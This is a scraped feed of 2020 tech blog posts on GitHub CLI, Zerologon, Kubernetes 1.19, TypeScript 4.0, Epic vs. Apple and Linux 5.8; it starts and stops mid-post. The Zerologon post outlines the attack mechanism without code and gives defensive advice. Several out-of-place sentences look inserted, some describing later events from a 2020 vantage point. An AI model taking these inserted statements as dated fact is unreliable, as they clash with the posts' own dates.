\u0026amp;\u0026amp; git commit -m \u0026quot;Fix race condition in cache invalidation\u0026quot; git push gh pr create --title \u0026quot;Fix race condition\u0026quot; --reviewer teammate Continue working No context switch. No browser tab management. No losing your terminal scroll position. It sounds trivial, but compounded across dozens of PRs per week, it adds up.\nThere\u0026rsquo;s also the automation angle. CI scripts, deployment pipelines, and developer tooling scripts can now interact with GitHub\u0026rsquo;s PR and issue workflows through a stable, official CLI. No more shelling out to curl with raw API calls or maintaining wrapper scripts around the REST API.\nThe API Integration # Under the hood, gh wraps GitHub\u0026rsquo;s GraphQL and REST APIs. This means you also get gh api as a general-purpose tool for hitting any GitHub API endpoint:\n# Get repo details as JSON gh api repos/owner/repo # List workflow runs gh api repos/owner/repo/actions/runs --jq \u0026#39;.workflow_runs[].name\u0026#39; The --jq flag for filtering JSON output is a nice touch. For anyone who\u0026rsquo;s written scripts that pipe curl output through jq to interact with GitHub\u0026rsquo;s API, this is a cleaner alternative with built-in authentication handling.\nWhat\u0026rsquo;s Missing # No tool ships perfect at 1.0, and there are some gaps. GitHub Actions management is limited — you can view workflow runs but can\u0026rsquo;t trigger them or manage workflow files. Gist support is minimal. Project boards aren\u0026rsquo;t covered at all.\nThe extension system is also not yet available, which means you can\u0026rsquo;t add custom commands. I\u0026rsquo;d love to see a plugin architecture that lets teams add organization-specific workflows. That would take gh from \u0026ldquo;useful tool\u0026rdquo; to \u0026ldquo;essential infrastructure.\u0026rdquo;\nBut these are 1.0 omissions, not design flaws. 
The foundation is solid, and the team has been responsive to community feedback throughout the beta period.\nMy Take # I\u0026rsquo;ve watched developer tooling evolve substantially over the years, from CVS to SVN to Git, from FTP deployments to CI/CD pipelines, from monolithic IDEs to composable editor setups. The common thread in tools that stick is that they meet developers where they already work, rather than forcing a context switch.\nGitHub CLI does exactly that. It doesn\u0026rsquo;t try to replace the web interface — the browser is still better for code review with complex diffs, for exploring repository insights, and for managing organization settings. What gh does is handle the high-frequency, low-complexity interactions that interrupt your flow when they require a browser.\nIf you\u0026rsquo;re a terminal-centric developer (and let\u0026rsquo;s be honest, most of us are), install it today:\n# macOS brew install gh # Windows scoop install gh # Debian/Ubuntu sudo apt install gh It\u0026rsquo;s open source, cross-platform, and it just works. That\u0026rsquo;s about the best endorsement I can give any developer tool. The 1.0 label means the GitHub team is committed to stability, and the fact that it\u0026rsquo;s maintained alongside the platform itself gives me confidence it won\u0026rsquo;t become abandonware. Welcome to the toolkit, gh.\n","date":"17 September 2020","externalUrl":null,"permalink":"/posts/200917-github-cli-1-developer-workflow/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub CLI 1.0 is here, bringing pull requests, issues, and repo management to the terminal. A look at what it means for developer workflows.","title":"GitHub CLI 1.0 — The Terminal-First Workflow Gets Official","type":"posts"},{"content":"Every few years, a vulnerability comes along that makes even jaded security professionals sit up straight. 
CVE-2020-1472, which researchers at Secura have dubbed \u0026ldquo;Zerologon,\u0026rdquo; is one of those. It scores a perfect 10.0 on the CVSS scale — the maximum severity rating — and for once, the score isn\u0026rsquo;t hyperbole.\nThe vulnerability allows an unauthenticated attacker with network access to a domain controller to completely compromise an entire Active Directory domain. No credentials required. No user interaction needed. Just a few carefully crafted network packets, and you\u0026rsquo;re the domain admin. This is exactly the kind of critical vulnerability that attackers pursue. If that doesn\u0026rsquo;t get your attention, I\u0026rsquo;m not sure what will.\nThe Technical Breakdown # At its core, Zerologon is a cryptographic flaw in Microsoft\u0026rsquo;s Netlogon Remote Protocol (MS-NRPC), the authentication protocol used for communication between domain-joined machines and domain controllers.\nThe protocol uses AES-CFB8 encryption for a challenge-response authentication handshake. The problem? The implementation sets the initialization vector (IV) to all zeros. In AES-CFB8 mode, this means that encrypting a plaintext of all zeros will produce a ciphertext of all zeros with a probability of 1-in-256.\nAn attacker can simply attempt authentication repeatedly with a credential consisting of all zeros. On average, it takes about 256 attempts — which can be completed in roughly three seconds — to successfully authenticate. Once in, the attacker can use the Netlogon protocol to set the computer account password of the domain controller itself.\nIt\u0026rsquo;s the kind of vulnerability that makes you wonder how it persisted for so long. The cryptographic issue is, in hindsight, almost textbook. AES-CFB8 with a fixed zero IV is a well-understood weakness. But these things hide in protocols that were designed decades ago and have been layered with complexity over the years. 
This mirrors the OpenSSL vulnerabilities that persist in widely-used infrastructure.\nWhy This Is Worse Than It Sounds # Let me count the ways this is particularly bad:\nNo authentication required. The attacker doesn\u0026rsquo;t need any credentials, domain membership, or an existing foothold on a domain-joined machine. They just need to be able to reach a domain controller on TCP port 135/445.\nIt\u0026rsquo;s fast. The entire attack completes in seconds, not minutes or hours. By the time anyone notices, it\u0026rsquo;s over.\nIt grants complete domain compromise. This isn\u0026rsquo;t a privilege escalation from user to admin. This is zero to domain admin in one step.\nExploitation is straightforward. Within days of the Secura whitepaper being published, working proof-of-concept code appeared publicly. The barrier to exploitation is low.\nActive Directory is everywhere. Virtually every enterprise network of any size runs Active Directory. This is not a niche product vulnerability — it affects the core of most corporate infrastructure.\nThe Patch Situation # Microsoft released patches in August\u0026rsquo;s Patch Tuesday — a month ago. But here\u0026rsquo;s the wrinkle: the fix is being rolled out in two phases. The August patch protects Windows devices by default and makes enforcement mode available as an opt-in setting, but it doesn\u0026rsquo;t fully block vulnerable connections from other devices. Full enforcement is scheduled for February 2021.\nThis phased approach is understandable from a compatibility perspective — there are likely many legacy devices and non-Windows systems that use the Netlogon protocol and would break with immediate full enforcement. But it also means that even patched systems remain partially vulnerable if enforcement mode isn\u0026rsquo;t explicitly configured.\nMy recommendation is blunt: if you haven\u0026rsquo;t applied the August patches yet, stop reading this and go do it now. Then enable full enforcement mode immediately if your environment allows it. 
The risk of breaking a legacy integration is far lower than the risk of a complete domain compromise that would affect your entire organization.\nThe Bigger Picture # Zerologon is a reminder of something I\u0026rsquo;ve been saying for years: the soft, chewy interior of corporate networks is where the real danger lies. We\u0026rsquo;ve spent enormous energy on perimeter security, endpoint detection, and email filtering. Meanwhile, protocols designed in the 1990s sit at the heart of our identity infrastructure with cryptographic flaws that a second-year computer science student could identify.\nThis vulnerability also highlights the problem with patch timelines. Microsoft had this reported months ago, patched it in August, and even now we\u0026rsquo;re in a partial-enforcement state. Meanwhile, working exploit code is freely available. The window between \u0026ldquo;patch available\u0026rdquo; and \u0026ldquo;patch applied\u0026rdquo; is where attackers live, and for critical infrastructure like domain controllers, that window needs to be as close to zero as possible.\nWhat To Do Right Now # If you\u0026rsquo;re responsible for any Windows Active Directory environment:\nVerify August 2020 patches are installed on every domain controller Enable enforcement mode via the FullSecureChannelProtection registry key Monitor event logs for Event IDs 5827, 5828, and 5829, which indicate vulnerable Netlogon connections Audit network access to domain controllers — TCP 135 and 445 should not be reachable from untrusted network segments Assume breach if you were unpatched when the exploit code went public, and investigate accordingly I\u0026rsquo;ve seen a lot of critical vulnerabilities over three decades in this industry. This one genuinely deserves the urgency. The combination of ease of exploitation, severity of impact, and ubiquity of the target makes Zerologon one of the most dangerous Windows vulnerabilities in recent memory. 
Patch today, not tomorrow.\n","date":"10 September 2020","externalUrl":null,"permalink":"/posts/200910-zerologon-cve-2020-1472/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2020-1472, dubbed Zerologon, scores a perfect 10.0 CVSS and allows full domain takeover with a handful of packets. Here’s what you need to know.","title":"Zerologon — The 10-Out-of-10 Vulnerability That Should Terrify You","type":"posts"},{"content":"Last week, the Kubernetes project shipped version 1.19, and while it may not have the headline-grabbing appeal of some earlier releases, I think this one deserves more attention than it\u0026rsquo;s getting. After nearly three decades in this industry, I\u0026rsquo;ve learned that the releases that matter most are rarely the flashy ones — they\u0026rsquo;re the ones that make the boring stuff reliable.\nExtended Support: Finally # The single most impactful change in 1.19 isn\u0026rsquo;t a new API or a fancy feature. It\u0026rsquo;s the decision to extend the support window from 9 months to 12 months. That might sound like a minor policy tweak, but if you\u0026rsquo;ve been running Kubernetes in production, you know exactly how painful the upgrade treadmill has been.\nWith a new release every quarter and only three versions supported at any time, teams were essentially forced into a perpetual upgrade cycle. For enterprises with change management processes, compliance requirements, and the general inertia of large organizations, this was brutal. I\u0026rsquo;ve worked with teams that were spending a significant portion of their infrastructure engineering time just keeping up with Kubernetes versions rather than building on top of them.\nTwelve months of support means you can realistically plan one major upgrade per year instead of scrambling every few months. 
It\u0026rsquo;s a maturity signal — the project is acknowledging that production stability matters more than feature velocity.\nIngress Graduates to V1 # The Ingress API has been in beta since Kubernetes 1.1, which shipped back in 2015. Five years in beta. Let that sink in for a moment. This is one of the most widely used APIs in the entire Kubernetes ecosystem, and it\u0026rsquo;s been technically \u0026ldquo;not stable\u0026rdquo; for half a decade.\nWith 1.19, Ingress finally reaches General Availability status. The networking.k8s.io/v1 version brings some welcome refinements:\nA pathType field that removes ambiguity about how paths are matched IngressClass resources that formalize what was previously handled through annotations Cleaner separation between different ingress controller implementations If you\u0026rsquo;re running any kind of web workload on Kubernetes (and who isn\u0026rsquo;t?), this matters. The annotation-based approach to configuring ingress controllers was always a hack — every controller had its own set of non-standard annotations, and switching between them meant rewriting your manifests. IngressClass doesn\u0026rsquo;t solve everything, but it\u0026rsquo;s a step in the right direction.\nStorage Capacity Tracking # Another feature that caught my eye is the storage capacity tracking mechanism, entering alpha in this release. The problem it addresses is something I\u0026rsquo;ve run into personally: Kubernetes\u0026rsquo; scheduler doesn\u0026rsquo;t know how much storage capacity is actually available on nodes when making pod scheduling decisions.\nThis means you can end up with a pod scheduled to a node that can\u0026rsquo;t actually provision the persistent volume it needs. The pod just sits there in a pending state, and you\u0026rsquo;re left debugging why your stateful workload won\u0026rsquo;t start.\nThe new CSIStorageCapacity objects let storage drivers report available capacity back to the scheduler. 
It\u0026rsquo;s alpha, so don\u0026rsquo;t run to production with it, but it\u0026rsquo;s addressing a real operational pain point that anyone running stateful workloads on Kubernetes has encountered.\nSeccomp Profiles Go GA # Security folks will appreciate that seccomp profile support has also reached GA. Seccomp (secure computing mode) lets you restrict which system calls a container can make, and it\u0026rsquo;s been a recommended security hardening measure for years. Having it as a stable, first-class feature in the pod security context removes another barrier to proper container security.\nThe syntax is cleaner now too. Instead of the old annotation-based approach (seccomp.security.alpha.kubernetes.io/pod), you can specify seccomp profiles directly in the pod\u0026rsquo;s securityContext:\nsecurityContext: seccompProfile: type: RuntimeDefault Small change, big improvement in usability. Security features that are hard to use don\u0026rsquo;t get used.\nMy Take # I\u0026rsquo;ve been watching Kubernetes evolve since its early days, and 1.19 feels like a release that reflects where the project needs to be right now. The container orchestration wars are effectively over — Kubernetes won. The question is no longer \u0026ldquo;should we use Kubernetes?\u0026rdquo; but \u0026ldquo;how do we run Kubernetes well?\u0026rdquo;\nThat means longer support windows, stabilizing long-running beta APIs, and filling in operational gaps like storage capacity tracking. It\u0026rsquo;s not exciting, but it\u0026rsquo;s exactly what the ecosystem needs.\nThe extended support window alone will save countless engineering hours across the industry. And the Ingress GA promotion, while overdue, signals that the project takes API stability seriously — even if the timeline is longer than anyone would like.\nIf you\u0026rsquo;re planning your next upgrade cycle, 1.19 is a solid target. Just remember: read the release notes carefully before you start. 
There are always deprecations hiding in there.\n","date":"3 September 2020","externalUrl":null,"permalink":"/posts/200903-kubernetes-119-extensibility/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.19 lands with extended support windows, Ingress API improvements, and a clear signal that the platform is maturing fast.","title":"Kubernetes 1.19 — The Extensibility Release That Quietly Matters","type":"posts"},{"content":"Kubernetes 1.19 was released yesterday, and for once, the headline isn\u0026rsquo;t a flashy new feature — it\u0026rsquo;s stability. This release extends the support window from 9 months to a full year, making it the longest-supported Kubernetes release to date. For those of us running Kubernetes in production, this is arguably more valuable than any new API or controller.\nThe release includes 34 enhancements, with 10 graduating to stable, 15 in beta, and 9 entering alpha. It\u0026rsquo;s a mature, well-rounded release that reflects where Kubernetes is in its lifecycle: less about adding surface area and more about hardening what\u0026rsquo;s already there.\nThe Support Window Extension # Let\u0026rsquo;s talk about why a longer support window matters so much. In a quarterly release cycle with 9-month support, you had roughly 3-6 months of overlap between supported versions. This meant teams were perpetually planning or executing upgrades. For organizations with change management processes, compliance requirements, or simply limited DevOps bandwidth, staying on a supported version was a treadmill.\nWith 12 months of support, you get breathing room. You can skip a release without falling off the support cliff. You can test upgrades more thoroughly. 
You can align Kubernetes upgrades with your own release cycles instead of being dictated by the upstream schedule.\nI\u0026rsquo;ve managed Kubernetes clusters across several organizations, and the upgrade pressure was consistently one of the biggest operational challenges. Not because upgrades are technically difficult (the process has improved dramatically), but because every upgrade requires testing workloads, validating configurations, coordinating with application teams, and scheduling maintenance windows. Doing this every quarter is exhausting. Doing it every six months is manageable. By the time Kubernetes 1.22 arrived, the extended support window had proven its value to the broader ecosystem.\nThe Kubernetes project acknowledged that the rapid release cycle was causing strain on both users and the project itself. Later Kubernetes releases continued to balance innovation and stability. Patch releases for three concurrent versions consumed significant maintainer bandwidth. By extending the support window, they\u0026rsquo;re making a pragmatic trade-off: slightly more maintenance burden per version, but better sustainability for both the project and its users.\nIngress API Graduation to V1 # Kubernetes API maturity has been a consistent theme of platform evolution.\nThe Ingress API finally graduates to networking.k8s.io/v1 in this release. Ingress has been in beta since Kubernetes 1.1 — that\u0026rsquo;s nearly five years in beta, which has become something of a running joke in the community. The graduation brings formal stability guarantees and some meaningful improvements.\nThe v1 Ingress spec includes pathType, which lets you specify whether a path should be matched as an exact string, a prefix, or using the implementation-specific behavior. Gateway API would eventually provide even more sophisticated routing capabilities. 
This addresses a long-standing source of confusion where different ingress controllers interpreted paths differently, leading to subtle routing bugs that were hard to diagnose.\napiVersion: networking.k8s.io/v1 kind: Ingress metadata: name: example spec: rules: - host: app.example.com http: paths: - path: /api pathType: Prefix backend: service: name: api-service port: number: 80 If you\u0026rsquo;re currently using extensions/v1beta1 or networking.k8s.io/v1beta1 for your Ingress resources, now is the time to plan your migration. The beta APIs will be deprecated and eventually removed. The migration is straightforward — mostly renaming fields and adding pathType — but it touches every Ingress manifest in your cluster, so plan accordingly.\nStorage Improvements # Several storage features landed in 1.19. CSI volume health monitoring entered alpha, providing a standardized way to detect and report when persistent volumes become unhealthy. If you\u0026rsquo;ve ever had a pod stuck in a crash loop because its underlying storage went bad, you\u0026rsquo;ll appreciate having a proper signal for this rather than relying on application-level timeouts.\nGeneric ephemeral volumes also entered alpha, allowing any CSI driver that supports dynamic provisioning to provide ephemeral storage. This is useful for workloads that need temporary storage with specific characteristics — think scratch space on fast local SSDs or temporary volumes from a specific storage class. Previously, only CSI drivers that explicitly supported ephemeral mode could be used this way.\nFor production operators, these storage improvements are incremental but important. Storage is often the most operationally complex part of a Kubernetes deployment, and better tooling for monitoring and managing volumes reduces the risk of data-related incidents.\nStructured Logging Initiative # Kubernetes 1.19 kicks off a structured logging initiative that aims to migrate the project\u0026rsquo;s logging from unstructured text to structured key-value pairs. 
This is a long-term effort that will play out across multiple releases, but the foundation is being laid now.\nAs someone who has spent more hours than I\u0026rsquo;d like to admit parsing Kubernetes logs with regex, structured logging can\u0026rsquo;t come soon enough. The current log format is inconsistent across components, making it difficult to build reliable log parsing pipelines. Structured logs will enable better filtering, aggregation, and alerting — the basic building blocks of operational observability.\nThe practical impact won\u0026rsquo;t be felt immediately, as the migration will be gradual. But if you\u0026rsquo;re building or evaluating log aggregation infrastructure for your clusters, knowing that structured logs are coming should inform your architecture decisions.\nMy Take # Kubernetes 1.19 is a release that prioritizes the people who run Kubernetes over the people who present about it at conferences. The extended support window, Ingress graduation, and storage improvements are all operational concerns — they make Kubernetes easier to run reliably in production.\nThis shift in priorities feels right for where Kubernetes is in its maturity curve. The platform has won the container orchestration battle. The question is no longer \u0026ldquo;should we use Kubernetes?\u0026rdquo; but \u0026ldquo;how do we run it well?\u0026rdquo; Releases that focus on stability, supportability, and operational tooling answer that question better than new alpha features ever could.\nIf you\u0026rsquo;re running 1.17 or 1.18, I\u0026rsquo;d recommend planning your upgrade to 1.19 within the next quarter. The longer support window gives you a stable foundation, and the Ingress v1 migration is something you\u0026rsquo;ll need to do regardless. 
Get ahead of it while the timeline is comfortable.\n","date":"27 August 2020","externalUrl":null,"permalink":"/posts/200827-kubernetes-1-19-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.19 arrives with the longest support window yet and a focus on stability features. For production operators, this is the release we’ve been asking for.","title":"Kubernetes 1.19 — Stability Takes Center Stage","type":"posts"},{"content":"TypeScript 4.0 landed today, and despite the team\u0026rsquo;s repeated assurances that major version bumps don\u0026rsquo;t mean breaking changes (they follow semver for the compiler API, not the language), this release feels genuinely significant. The headline features — variadic tuple types, labeled tuple elements, and class property inference from constructors — represent meaningful improvements to TypeScript\u0026rsquo;s type system that I\u0026rsquo;ve been wanting for years.\nI\u0026rsquo;ve been writing TypeScript since the 2.x days, gradually migrating Node.js projects from plain JavaScript as the type system matured. Later language evolution across the industry showed similar type system maturation. With 4.0, I\u0026rsquo;m more confident than ever that TypeScript is the right choice for any non-trivial JavaScript project. Modern development practices increasingly rely on strong typing.\nVariadic Tuple Types: Finally # The feature I\u0026rsquo;m most excited about is variadic tuple types. If you\u0026rsquo;ve ever tried to write a strongly-typed concat function, a tail utility, or anything that manipulates arrays at the type level, you\u0026rsquo;ve hit the wall that this feature demolishes.\nPreviously, if you wanted to type a function that concatenates two arrays, you\u0026rsquo;d need to write dozens of overloads to cover different tuple lengths. 
Libraries like ts-toolbelt had elaborate workarounds, and the TypeScript compiler\u0026rsquo;s own type definitions used massive overload lists for methods like Promise.all.\nWith variadic tuple types, you can express this naturally:\nfunction concat\u0026lt;T extends unknown[], U extends unknown[]\u0026gt;( arr1: [...T], arr2: [...U] ): [...T, ...U] { return [...arr1, ...arr2]; } The spread operator now works at the type level, matching how it works at the value level. This is elegant, and it\u0026rsquo;s the kind of type-system feature that makes TypeScript feel less like a bolt-on and more like a language designed from the ground up.\nFor library authors, this is transformative. Typing higher-order functions, curry implementations, and variadic APIs becomes dramatically simpler. The JavaScript tooling ecosystem continued to benefit from TypeScript\u0026rsquo;s type maturity. I expect we\u0026rsquo;ll see significant improvements in the type definitions for popular libraries in the coming months.\nLabeled Tuple Elements # This one is smaller but immediately practical. Tuple types can now have labels:\ntype Range = [start: number, end: number]; type UserEntry = [id: number, name: string, active: boolean]; Without labels, tuple types are opaque — you see [number, number] in your IDE and have no idea what each position means without checking the documentation. Labels fix this by providing named context directly in the type signature.\nThis matters for API design. When a function returns a tuple (as has become more common with React hooks and similar patterns), labeled tuples make the return type self-documenting. It\u0026rsquo;s a quality-of-life improvement that costs nothing and improves code readability everywhere it\u0026rsquo;s used.\nShort-Circuiting in Compound Assignments # TypeScript 4.0 supports the new JavaScript logical assignment operators: \u0026amp;\u0026amp;=, ||=, and ??=. 
These correspond to the TC39 Stage 4 proposal that\u0026rsquo;s heading into the next ECMAScript specification.\n// Before options.value = options.value ?? defaultValue; // After options.value ??= defaultValue; This is syntactic sugar, but good syntactic sugar. The ??= operator in particular fills a common pattern in configuration handling and default value assignment. I\u0026rsquo;ve written the longhand version thousands of times across various projects, and having a concise alternative will make code cleaner.\nWhat I appreciate about TypeScript\u0026rsquo;s approach here is that they track the TC39 process closely and implement proposals once they reach Stage 3 or 4. You get access to future JavaScript features today, with type safety, and confidence that the syntax won\u0026rsquo;t change before it\u0026rsquo;s standardized.\nImproved Editor Experience # TypeScript 4.0 brings several editor improvements that might not make the blog post headlines but will save you time daily. The compiler can now partially process files during editing, providing faster feedback in large projects. Auto-import suggestions are smarter, preferring imports from packages you\u0026rsquo;ve already imported elsewhere in the project.\nThere\u0026rsquo;s also /** @deprecated */ JSDoc support, which shows deprecated API usage with a strikethrough in your editor. This is particularly useful when maintaining libraries — you can mark old APIs as deprecated and give consumers visual feedback without breaking their builds.\nFor those of us who spend most of our day in VS Code (or any editor with TypeScript language server support), these incremental improvements compound. The gap between \u0026ldquo;writing code\u0026rdquo; and \u0026ldquo;having your tools understand your code\u0026rdquo; continues to shrink with each release.\nMy Take # TypeScript 4.0 is a confident, well-executed release. 
The team resisted the temptation to cram breaking changes into a major version bump, instead focusing on features that make the type system more expressive without adding complexity for developers who don\u0026rsquo;t need the advanced features.\nWhat impresses me most about TypeScript\u0026rsquo;s trajectory is the consistency. Every release since 2.0 has added meaningful capabilities while maintaining backward compatibility. The migration path from JavaScript to TypeScript remains smooth, and existing TypeScript codebases can adopt new features incrementally. That\u0026rsquo;s hard to do, and the team deserves credit for maintaining that discipline over years of development.\nIf you\u0026rsquo;re still on the fence about TypeScript, 4.0 is as good a time as any to make the switch. The tooling is mature, the community is enormous, and the language itself is at a point where it handles the vast majority of real-world patterns gracefully. And if you\u0026rsquo;re already a TypeScript user, upgrade and enjoy. This one\u0026rsquo;s a good release.\n","date":"20 August 2020","externalUrl":null,"permalink":"/posts/200820-typescript-4-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 4.0 is here with variadic tuple types, labeled tuples, and smarter inference. It’s a major version that earns its number.","title":"TypeScript 4.0 — A Milestone Worth Celebrating","type":"posts"},{"content":"Today might be remembered as a turning point for the mobile development ecosystem. Epic Games deliberately triggered a confrontation with Apple by adding a direct payment option to Fortnite on iOS, bypassing Apple\u0026rsquo;s 30% commission on in-app purchases. Apple responded within hours by removing Fortnite from the App Store. 
Epic, clearly prepared, immediately filed a lawsuit and launched a PR campaign called \u0026ldquo;#FreeFortnite\u0026rdquo; — complete with a parody of Apple\u0026rsquo;s famous 1984 ad.\nThis isn\u0026rsquo;t a spontaneous dispute. This is a carefully orchestrated legal and public relations strategy, and regardless of where you stand, it has the potential to reshape how all of us build and distribute software.\nThe 30% Problem # Apple\u0026rsquo;s App Store takes a 30% commission on digital purchases. This has been the standard since the App Store launched in 2008, and Google\u0026rsquo;s Play Store follows the same model. For context, that means if a user buys a $10 in-app item, the developer receives $7 and Apple gets $3. This represents a form of platform consolidation that has shaped the entire mobile economy.\nFor twelve years, developers have largely accepted this as the cost of accessing Apple\u0026rsquo;s platform. But the frustration has been building. Spotify filed an EU antitrust complaint last year. The European Commission opened investigations. The US House Judiciary Committee held hearings on tech platform power, where Apple\u0026rsquo;s Tim Cook testified alongside tech leaders, signaling increasing regulatory scrutiny.\nEpic\u0026rsquo;s move is different because they\u0026rsquo;re not just complaining — they\u0026rsquo;re forcing a legal confrontation while simultaneously waging a public campaign. The lawsuit filing is substantive, running to 62 pages and drawing on antitrust precedent. This isn\u0026rsquo;t a publicity stunt; it\u0026rsquo;s a legal strategy with serious resources behind it.\nWhy This Matters Beyond Gaming # If you\u0026rsquo;re thinking \u0026ldquo;I don\u0026rsquo;t make games, this doesn\u0026rsquo;t affect me,\u0026rdquo; think again. Apple\u0026rsquo;s App Store policies impact every developer who ships on iOS. 
The 30% commission applies to digital goods and services across the board — subscriptions, digital content, premium features. If your app charges for anything digital, Apple takes its cut.\nThe restrictions go beyond the commission. Apple\u0026rsquo;s guidelines prohibit apps from even telling users that they can purchase content elsewhere. You can\u0026rsquo;t link to your website for purchases. You can\u0026rsquo;t mention that a web version exists with different pricing. This information asymmetry is what frustrates many developers, myself included. It\u0026rsquo;s one thing to charge a fee for distribution; it\u0026rsquo;s another to prevent your customers from knowing about alternatives.\nFor enterprise and B2B developers, the impact is more nuanced but still real. Apple\u0026rsquo;s review process introduces unpredictable delays in your release cycle. Their interpretation of guidelines can change without notice, potentially breaking your business model overnight. I\u0026rsquo;ve worked with teams that spent weeks redesigning features to comply with App Store review feedback, only to see similar features approved in competing apps or platforms.\nThe Possible Outcomes # Let\u0026rsquo;s game out the scenarios. If Epic wins — either through the courts or by forcing Apple to negotiate — we could see a reduction in commission rates, the ability to use alternative payment processors, or even the opening of iOS to alternative app stores. Any of these would be significant for the developer ecosystem and represent a shift in platform consolidation dynamics.\nIf Apple wins, the status quo continues, but with even more legal precedent backing Apple\u0026rsquo;s position. This would solidify the current model and potentially embolden similar gatekeeping on other platforms.\nThe most likely outcome, in my estimation, is somewhere in the middle. 
Apple has already made small concessions recently — reducing the commission to 15% for subscription renewals after the first year, for instance. A broader reduction or the introduction of a tiered commission structure seems plausible, especially with regulatory pressure mounting from the EU.\nWhat I don\u0026rsquo;t expect is the complete dismantling of Apple\u0026rsquo;s walled garden. Apple will argue — correctly, in some respects — that its review process and distribution infrastructure provide real value: security screening, payment processing, global distribution, and consumer trust. The question is whether that value justifies a 30% tax and the restrictions that come with it.\nWhat Developers Should Do Right Now # Practically speaking, nothing changes immediately. This legal battle will play out over months, possibly years. But there are some prudent steps to consider.\nFirst, if you haven\u0026rsquo;t already, invest in your web experience. Progressive Web Apps have been improving steadily, and having a strong web fallback reduces your dependency on any single app store. I\u0026rsquo;ve been advocating for this approach with my teams for years, and the current situation only reinforces that position.\nSecond, architect your payment systems for flexibility. Abstract your payment processing behind clean interfaces so that if the rules change, you can adapt quickly. Don\u0026rsquo;t hard-code assumptions about commission rates or payment flows.\nThird, pay attention to the regulatory landscape. The EU\u0026rsquo;s Digital Markets Act is taking shape, and similar legislation is being discussed in the US, Australia, and elsewhere. The rules governing platform businesses are likely to evolve significantly in the coming years.\nMy Take # I have mixed feelings about this situation. Apple built an extraordinary platform and invested heavily in the ecosystem that makes iOS development viable. They deserve compensation for that. 
But 30% feels excessive for what is, at this point, largely automated distribution. And the restrictions on communication between developers and their own customers feel paternalistic at best.\nEpic isn\u0026rsquo;t a scrappy underdog — they\u0026rsquo;re a multi-billion dollar company making a calculated business move. But the outcome of this fight will disproportionately benefit smaller developers who don\u0026rsquo;t have the resources to challenge Apple on their own. Sometimes it takes a giant to fight a giant on behalf of everyone else.\nWhatever happens, I\u0026rsquo;m glad this conversation is finally happening in a courtroom rather than just on forums and Twitter threads. The relationship between platforms and the developers who build on them is too important to be governed solely by the platform\u0026rsquo;s terms of service.\n","date":"13 August 2020","externalUrl":null,"permalink":"/posts/200813-epic-vs-apple-developer-impact/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Epic Games just declared war on Apple’s App Store policies. The implications for the developer ecosystem extend far beyond gaming.","title":"Epic vs. Apple — What the Fortnite Fight Means for Developers","type":"posts"},{"content":"Linux 5.8 dropped on August 2nd, and Linus Torvalds wasn\u0026rsquo;t shy about its significance. In his release announcement, he called it \u0026ldquo;one of our biggest releases of all time\u0026rdquo; based on the sheer number of commits — over 14,000 non-merge commits touching nearly 20% of all files in the kernel tree. Having followed kernel development for the better part of two decades, I can confirm: this is an unusually large release, even by Linux standards.\nThe Numbers Behind the Hype # To put 5.8 in context, this release saw contributions from over 1,900 developers across 200+ companies. The diffstat shows approximately 800,000 lines added and 200,000 lines removed. 
That\u0026rsquo;s a net addition of 600,000 lines in a single release cycle — roughly two months of development.\nWhat drove this volume? A confluence of factors. Several major subsystem overhauls landed simultaneously, and the ongoing work to remove legacy code while adding new hardware support created a perfect storm of changes. The kernel\u0026rsquo;s development model, where maintainers collect patches in their own trees and submit pull requests during the merge window, means that sometimes multiple large efforts converge in the same release.\nFor those of us who rely on Linux in production (which, let\u0026rsquo;s be honest, is most backend developers at this point), the scale of change might sound alarming. But the kernel\u0026rsquo;s testing infrastructure and staged release process — with multiple release candidates over several weeks — means that by the time 5.8 reaches stable, it\u0026rsquo;s been thoroughly exercised. The process works, even when the changeset is enormous.\nKey Changes That Matter for Developers # Thunderbolt and USB4 support got a significant overhaul, with the Thunderbolt driver being moved out of its standalone position and integrated more deeply into the kernel\u0026rsquo;s bus infrastructure. This is forward-looking work that prepares Linux for the next generation of high-speed connectivity, and it\u0026rsquo;s the kind of infrastructure investment that pays dividends for years.\nThe new fanotify features are particularly relevant for anyone building file monitoring or security tools. The filesystem notification API now supports additional event types and improved filtering, making it easier to build efficient file-watching systems without resorting to inotify hacks or periodic polling. If you\u0026rsquo;ve ever built a deployment watcher or log rotator, you know how much these improvements matter.\nKernel concurrency sanitizer (KCSAN) enhancements continue to improve the kernel\u0026rsquo;s ability to detect data races at runtime. 
As someone who has debugged more than their share of race conditions, I appreciate any tooling that makes these bugs easier to find. KCSAN is part of a broader trend toward building safety nets directly into the development and testing workflow.\nThe energy-aware scheduling improvements are worth noting too, especially if you\u0026rsquo;re running workloads on ARM-based servers or edge devices. The scheduler now makes smarter decisions about task placement across heterogeneous CPU cores, balancing performance against power consumption. With ARM servers gaining traction in data centers, this work is increasingly relevant beyond embedded systems.\nThe Shadow of Inclusivity Discussions # It\u0026rsquo;s worth mentioning that 5.8 also includes changes to the kernel\u0026rsquo;s terminology, replacing terms like \u0026ldquo;master/slave\u0026rdquo; and \u0026ldquo;blacklist/whitelist\u0026rdquo; with more neutral alternatives. This follows similar moves by other major open source projects, including Git\u0026rsquo;s new init.defaultBranch setting, which lets users pick a default branch name other than master.\nI\u0026rsquo;ve seen heated debates about these changes in various forums. From a purely pragmatic engineering perspective, the technical impact is minimal — it\u0026rsquo;s mostly documentation and variable naming. The social impact, however, is meaningful to the people these terms affect. In a project with nearly 2,000 contributors per release, fostering an inclusive environment isn\u0026rsquo;t just a nice-to-have; it\u0026rsquo;s a prerequisite for attracting and retaining talent.\nAs someone who has managed development teams across multiple countries and cultures, I\u0026rsquo;ve learned that the small signals you send about inclusivity compound over time. The code works the same regardless of what you name your variables, but the community doesn\u0026rsquo;t.\nMy Take # Linux 5.8 is a solid release that reflects the kernel project\u0026rsquo;s continued maturity. 
